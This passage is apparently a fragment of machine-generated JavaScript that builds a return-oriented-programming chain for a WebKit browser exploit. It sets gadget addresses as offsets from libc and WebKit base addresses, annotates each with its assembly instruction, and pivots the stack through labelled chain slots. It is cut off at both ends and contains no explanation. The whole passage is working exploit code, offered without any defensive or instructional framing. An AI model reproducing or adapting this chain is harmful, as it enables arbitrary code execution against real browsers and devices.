db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4863: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+261592, //L4864 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+261608, //L4865 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4864: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4865: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+261784, 
//L4867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+261800, //L4868 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+261768, //L4866 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4866: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4867: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4868: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+261912, //L4870 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+261960, //L4873 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+261928, //L4871 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4870: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4871: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4872: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4873: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+262072, //L4874+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+262064, //L4874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4874: db([0, 0]); // 0x0 set_gadgets([ ropchain+262088, //L4874+24 ropchain+271584, //L4869 libc_base+764760, //pop rsi ropchain+262128, //L4875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4875: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4877: db([64, 
0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+262248, //L4880 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+262232, //L4878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4878: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4880: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+262408, //L4884 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+262376, //L4882 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+262392, //L4883 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4881: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4882: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4883: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4884: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+262464, //L4886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4886: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+262592, //L4888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+262608, //L4889 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+262576, //L4887 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4887: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4888: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4889: db([0, 
0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+262768, //L4893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+262736, //L4891 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+262752, //L4892 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4890: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4891: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4892: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4893: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+262824, //L4895 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4895: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+262952, //L4897 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+262968, //L4898 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+262936, //L4896 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4896: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4897: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4898: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+263080, //L4900 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+263128, //L4903 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+263096, //L4901 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 webkit_base+3236123 //pop r9 ]); //L4900: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4901: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4902: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4903: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+263240, //L4904+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+263232, //L4904 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4904: db([0, 0]); // 0x0 set_gadgets([ ropchain+263256, //L4904+24 ropchain+265280, //L4899 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+263296, //L4905 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4905: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4906: db([45, 0]); // 0x2d set_gadget(libc_base+144605,); //pop rdi //L4907: db([45, 0]); // 0x2d set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+263488, //L4911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+263456, //L4909 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+263472, //L4910 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4908: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4909: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4910: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4911: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+263544, //L4913 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, 
//mov rax, rdi libc_base+144605 //pop rdi ]); //L4913: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+263672, //L4915 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+263688, //L4916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+263656, //L4914 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4914: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4915: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4916: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+263784, //L4918 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+263768, //L4917 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4917: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4918: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+263864, //L4919 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4919: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4921: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+263984, //L4924 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+263968, //L4922 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4922: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4924: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+264128, //L4927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+264096, //L4925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+264112, //L4926 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4925: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4926: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4927: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+264200, //L4929 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4929: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+264256, //L4930 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4930: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+264336, //L4932 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4932: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4934: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+264456, //L4937 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+264440, //L4935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4935: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop 
rdi //L4937: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+264600, //L4940 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+264568, //L4938 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+264584, //L4939 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4938: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4939: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4940: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+264688, //L4942 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4941: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4942: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+264744, //L4943 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4943: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4945: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+264824, //L4947 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4947: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+264928, //L4948 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+264944, 
//L4949 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4948: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4949: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+265032, //L4951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4951: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+265088, //L4952 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4952: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+265160, //L4955 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4955: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+265216, //L4956 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4956: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+271584, //L4958 //L4899: libc_base+764760, //pop rsi ropchain+265320, //L4959 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4959: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4961: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, 
rsi libc_base+764760, //pop rsi ropchain+265440, //L4964 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+265424, //L4962 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4962: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4964: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+265616, //L4967 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+265632, //L4968 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+265584, //L4965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+265600, //L4966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4965: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4966: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4967: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4968: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+265728, //L4970 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+265712, //L4969 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4969: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4970: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4971: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4972: db([2, 0]); // 0x2 set_gadget(libc_base+763368,); //pop rcx //L4973: db([2, 0]); // 0x2 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+265928, //L4975 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4975: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+265984, //L4976 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4976: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+266120, //L4980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+266104, //L4979 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4978: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4979: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4980: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+266256, //L4983 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+266288, //L4985 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+266240, //L4982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4982: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4983: 
db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4984: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4985: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+266400, //L4986+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+266392, //L4986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4986: db([0, 0]); // 0x0 set_gadgets([ ropchain+266416, //L4986+24 ropchain+268440, //L4981 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+266456, //L4987 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4987: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4988: db([43, 0]); // 0x2b set_gadget(libc_base+144605,); //pop rdi //L4989: db([43, 0]); // 0x2b set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+266648, //L4993 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+266616, //L4991 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+266632, //L4992 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4990: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4991: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4992: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4993: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+266704, //L4995 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4995: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl 
libc_base+764760, //pop rsi ropchain+266832, //L4997 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+266848, //L4998 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+266816, //L4996 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4996: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4997: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4998: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+266944, //L5000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+266928, //L4999 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4999: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5000: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+267024, //L5001 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5001: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5003: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+267144, //L5006 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+267128, //L5004 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5004: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5006: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+267288, //L5009 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+267256, //L5007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+267272, //L5008 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5007: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5008: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5009: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+267360, //L5011 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5011: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+267416, //L5012 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5012: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+267496, //L5014 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5014: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5016: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+267616, //L5019 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+267600, //L5017 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5017: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5019: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi 
